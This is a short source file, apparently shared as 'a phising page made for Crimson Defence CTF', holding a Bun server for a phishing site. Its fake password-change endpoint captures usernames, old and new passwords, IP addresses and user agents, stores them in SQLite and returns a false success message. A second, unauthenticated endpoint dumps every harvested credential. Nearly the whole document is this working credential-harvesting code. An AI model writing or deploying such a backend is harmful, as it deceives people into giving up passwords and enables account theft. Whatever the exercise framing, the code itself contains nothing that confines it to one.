a phising page made for Crimson Defence CTF
dunkirk.sh
1import { serve } from "bun";
2import homepage from "./public/index.html";
3import adminpage from "./public/admin.html";
4import { SQL } from "bun";
5
6const db = new SQL("sqlite://database.db");
7await db`
8 CREATE TABLE IF NOT EXISTS passwords (
9 id INTEGER PRIMARY KEY AUTOINCREMENT,
10 username TEXT NOT NULL,
11 old_password TEXT NOT NULL,
12 new_password TEXT NOT NULL,
13 ip_address TEXT NOT NULL,
14 user_agent TEXT NOT NULL,
15 timestamp TEXT NOT NULL
16 );
17`;
18
19const server = serve({
20 routes: {
21 // HTML imports
22 "/": homepage,
23 "/admin": adminpage,
24
25 // API endpoints
26 "/api/change-password": {
27 async POST(req) {
28 const { username, current_password, new_password } =
29 (await req.json()) as {
30 username: string;
31 current_password: string;
32 new_password: string;
33 };
34
35 // Get client info
36 const ip_address = req.headers.get("x-forwarded-for") || "unknown";
37 const user_agent = req.headers.get("user-agent") || "unknown";
38
39 // Log the password change attempt
40 await db`
41 INSERT INTO passwords
42 (username, old_password, new_password, ip_address, user_agent, timestamp)
43 VALUES (
44 ${username},
45 ${current_password},
46 ${new_password},
47 ${ip_address},
48 ${user_agent},
49 ${new Date().toISOString()}
50 )
51 `;
52
53 // Log to console
54 console.log("Password change attempt:", {
55 username,
56 old_password: current_password,
57 new_password,
58 ip_address,
59 user_agent,
60 });
61
62 // Simulate successful password change
63 return Response.json({
64 success: true,
65 message: "Password changed successfully",
66 });
67 },
68 },
69
70 "/api/logs": {
71 async GET(req) {
72 const logs = await db`
73 SELECT * FROM passwords
74 `;
75 // Return all logs
76 return Response.json(logs);
77 },
78 },
79 },
80
81 // Enable development mode
82 development: true,
83});
84
85console.log(`Phishing server running at ${server.url}`);
86console.log(`Admin dashboard available at ${server.url}admin`);